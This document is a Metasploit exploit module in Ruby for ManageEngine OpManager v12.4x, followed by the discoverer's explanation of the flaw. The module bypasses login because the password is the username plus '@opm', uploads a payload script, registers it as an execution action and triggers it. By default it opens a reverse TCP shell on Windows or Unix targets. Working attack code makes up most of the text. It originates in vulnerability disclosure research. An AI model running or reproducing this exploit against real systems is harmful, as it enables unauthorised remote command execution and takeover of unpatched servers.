##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "ManageEngine OpManager v12.4x - Unauthenticated Remote Command Execution",
      'Description'    => %q(
        This module bypasses the user password requirement in the OpManager v12.4.034 and prior versions.
        It performs authentication bypass and executes commands on the server.
        Affected OPM builds till 124046 and APM Plugin builds till 14300.

        /////// This 0day has been published at DEFCON-AppSec Village. ///////

      ),
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
        ],
      'References'     =>
        [
          [ 'URL', 'http://pentest.com.tr/exploits/DEFCON-ManageEngine-OpManager-v12-4-Unauthenticated-Remote-Command-Execution.html' ]
        ],
      'DefaultOptions' =>
        {
          'WfsDelay' => 60,
          'RPORT' => 8060,
          'SSL' => false,
          'PAYLOAD' => 'generic/shell_reverse_tcp'
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'DisableNops' => true,
        },
      'Platform'       => ['unix', 'win'],
      'Targets' =>
        [
          [ 'Windows Target',
            {
              'Platform' => ['win'],
              'Arch' => ARCH_CMD,
            }
          ],
          [ 'Linux Target',
            {
              'Platform' => ['unix'],
              'Arch' => ARCH_CMD,
              'Payload' =>
                {
                  'Compat' =>
                    {
                      'PayloadType' => 'cmd',
                    }
                }
            }
          ]
        ],
      'DisclosureDate' => '10 August 2019 //DEFCON',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('USERNAME',  [true, 'OpManager Username', 'admin']),
        OptString.new('TARGETURI',  [true, 'Base path for ME application', '/'])
      ],self.class)
  end

  def check_platform(host, port, cookie)

    res = send_request_cgi(
      'rhost'   => host,
      'rport'   => port,
      'method'  => 'GET',
      'uri'     =>  normalize_uri(target_uri.path, 'showTile.do'),
      'cookie'  => cookie,
      'vars_get' => {
        'TileName' => '.ExecProg',
        'haid' => 'null',
      }
    )
    if res && res.code == 200 && res.body.include?('createExecProgAction')
      @dir = res.body.split('name="execProgExecDir" maxlength="200" size="40" value="')[1].split('" class=')[0]
      if @dir =~ /:/
        platform = Msf::Module::Platform::Windows
      else 
        platform = Msf::Module::Platform::Unix
      end
    else
      fail_with(Failure::Unreachable, 'Connection error occurred! DIR could not be detected.')
    end
    file_up(host, port, cookie, platform, @dir)
  end

  def file_up(host, port, cookie, platform, dir)
    if platform == Msf::Module::Platform::Windows
      filex = ".bat"
    else
      if payload.encoded =~ /sh/
        filex = ".sh"
      elsif payload.encoded =~ /perl/
        filex = ".pl"
      elsif payload.encoded =~ /awk 'BEGIN{/
        filex = ".sh"
      elsif payload.encoded =~ /python/
        filex = ".py"
      elsif payload.encoded =~ /ruby/
        filex = ".rb"
      else
        fail_with(Failure::Unknown, 'Payload type could not be checked!')
      end
    end
 
    @fname= rand_text_alpha(9 + rand(3)) + filex
    data = Rex::MIME::Message.new
    data.add_part('./', nil, nil, 'form-data; name="uploadDir"')
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"theFile\"; filename=\"#{@fname}\"")
 
    res = send_request_cgi({
      'rhost'   => host,
      'rport'   => port,
      'method' => 'POST',    
      'data'  => data.to_s,
      'agent' => 'Mozilla',
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'cookie' => cookie,
      'uri' => normalize_uri(target_uri, "Upload.do")     
    })
 
    if res && res.code == 200 && res.body.include?('icon_message_success')
      print_good("#{@fname} malicious file has been uploaded.")
      create_exec_prog(host, port, cookie, dir, @fname)
    else
      fail_with(Failure::Unknown, 'The file could not be uploaded!')
    end
  end

  def create_exec_prog(host, port, cookie, dir, fname)
 
    @display = rand_text_alphanumeric(7)
    res = send_request_cgi(
      'method'  => 'POST',
      'rhost'   => host,
      'rport'   => port,
      'uri'     =>  normalize_uri(target_uri.path, 'adminAction.do'),
      'cookie'  => cookie,
      'vars_post' => {
        'actions' => '/showTile.do?TileName=.ExecProg&haid=null',
        'method' => 'createExecProgAction',
        'id' => 0,
        'displayname' => @display,
        'serversite' => 'local',
        'choosehost' => -2,
        'abortafter' => 5,
        'command' => fname,
        'execProgExecDir' => dir,
        'cancel' => 'false'
      }
    )
 
    if res && res.code == 200 && res.body.include?('icon_message_success')
      actionid = res.body.split('actionid=')[1].split("','710','350','250','200')")[0] 
      print_status("Transactions completed. Attempting to get a session...")
      exec(host, port, cookie, actionid)
    else
      fail_with(Failure::Unreachable, 'Connection error occurred!')
    end
  end

  def exec(host, port, cookie, action)
    send_request_cgi(
      'method'  => 'GET',
      'rhost'   => host,
      'rport'   => port,
      'uri'     =>  normalize_uri(target_uri.path, 'common', 'executeScript.do'),
      'cookie'  => cookie,
      'vars_get' => {
        'method' => 'testAction',
        'actionID' => action,
        'haid' => 'null'
      }
    )
  end
 
  def peer
    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
  end
 
  def print_status(msg='')
    super("#{peer} - #{msg}")
  end
 
  def print_error(msg='')
    super("#{peer} - #{msg}")
  end
 
  def print_good(msg='')
    super("#{peer} - #{msg}")
  end 

  def check

    res = send_request_cgi(
      'method'  => 'GET',
      'uri'     =>  normalize_uri(target_uri.path, 'apiclient', 'ember', 'Login.jsp'),
    )

    if res && res.code == 200 && res.body.include?('Logout.do?showPreLogin=false')
      appm_adr = res.body.split('iframe src="')[1].split('/Logout.do?showPreLogin=false')[0]
      am_host = appm_adr.split('://')[1].split(':')[0]
      am_port = appm_adr.split('://')[1].split(':')[1]

      res = send_request_cgi(
        'rhost'   => am_host,
        'rport'   => am_port,
        'method'  => 'GET',
        'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
      )
      # Password check vulnerability in Java Script :/
      if res.body.include?('j_password.value=username')
        return Exploit::CheckCode::Vulnerable
      else 
        return Exploit::CheckCode::Safe
      end
    else 
      return Exploit::CheckCode::Safe
    end
  end

  def app_login

    res = send_request_cgi(
      'method'  => 'GET',
      'uri'     =>  normalize_uri(target_uri.path, 'apiclient', 'ember', 'Login.jsp'),
    )
    
    appm_adr = res.body.split('iframe src="')[1].split('/Logout.do?showPreLogin=false')[0]
    am_host = appm_adr.split('://')[1].split(':')[0]
    am_port = appm_adr.split('://')[1].split(':')[1]

    res = send_request_cgi(
      'rhost'   => am_host,
      'rport'   => am_port,
      'method'  => 'GET',
      'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
    )

    @cookie = res.get_cookies
    res = send_request_cgi(
      'method'  => 'POST',
      'rhost'   => am_host,
      'rport'   => am_port,
      'cookie'   => @cookie,
      'uri'     =>  normalize_uri(target_uri.path, '/j_security_check'),
      'vars_post' => {
        'clienttype' => 'html',
        'j_username' => datastore['USERNAME'],
        'j_password' => datastore['USERNAME'] + "@opm",
        'submit' => 'Login'
      }
    )

    if res && res.code == 302 or 303
      print_good("Authentication bypass was successfully performed.")
      res = send_request_cgi(
        'rhost'   => am_host,
        'rport'   => am_port,
        'cookie'  => @cookie,
        'method'  => 'GET',
        'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
      )

      @cookie = res.get_cookies
      check_platform(am_host, am_port, @cookie)
    else
      fail_with(Failure::NotVulnerable, 'Failed to perform authentication bypass! Try with another username...')
    end
  end

  def exploit
    unless Exploit::CheckCode::Vulnerable == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    app_login
  end
end
            
            

"ManageEngine Application Manager Plugin" is integrated to use a significant part of "ManageEngine OpManager".

Almost all OpManager applications are installed with this plugin.

If "Application Manager" is installed as a plugin, you can only access "Application Manager" from within "OpManager". Without OpManager it will also tell you that this is not possible if you want to login to "Application Manager".

Because "AppManager Plugin" controls the users in the database of "OpManager" and allows the transition automatically.

In fact, you don't have an "Application Manager" user.

While reviewing this Plugin, I noticed a very critical mistake that was left by the developer.

We can check if the "OpManager" application uses this plug-in in the source code on the homepage with "/Logout.do?showPreLogin=false" parameters.

We've found our Plugin address. "http://192.168.1.5:9090". It works on port 9090 on the same server. It can also work in a different port.

I decided to check out the javascript control that was coded for this plugin, and what I encountered was greatly surprised.

Only "username" + "@opm" is required for the password in the user information field required for access to Application Manager. By default, "admin" hosts the user in two applications. We already know that.

So if the username is "admin", the password will be "admin@opm" :)) This is really funny...

As you can see, we have logged into "Application Manager" as "admin". Now we can run the command on the server using the application's own property.

Vulnerability affected OPM builds till 124046 and APM Plugin builds till 14300.